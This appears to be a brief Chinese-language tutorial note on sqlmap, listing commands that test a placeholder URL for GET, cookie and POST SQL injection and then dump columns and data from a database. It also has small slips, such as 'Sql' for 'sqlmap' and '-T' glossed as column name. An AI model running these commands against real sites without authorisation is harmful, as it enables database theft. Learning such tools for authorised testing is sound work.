2019年12月17日 星期一 CQCET
Sqlmap介绍:
Sqlmap是一款自动注入工具,kali,bt内置了该软件(windows可在官网下载),sqlmap是由python开发,开源软件,相比啊d,民小子,御剑之类的注入工具,sqlmap更加强大,它自带字典,可在多平台运行,可以进行mysql,access,mssql等数据库的注入。
访问一个网站,检查是否存在get注入漏洞:
命令:
Sql -u ‘xxx.com’
-u 检查是否存在get注入
返回值得到可以注入,注入类型为get盲注,及系统,数据库信息。
判断url是否存在cookie注入
命令:
Sqlmap -u ‘xxx.com’ --cookie ‘id=xx’ --level 2
测试结果
判断url是否存在post注入
命令:sqlmap -u ‘xxx.com’ --data ‘key=value&xx=xx’
测试结果是失败的
Sqlmap -u ‘xxx.com’ -D xx(数据库名)-T xx (列名) --columns [获取表内列信息]
Sqlmap -u ‘xxx.com’ -D xx (数据库名) -T xx (表名) -C xx,xx (列名) --dump [根据库,表,拆xx,xx列中的数据]
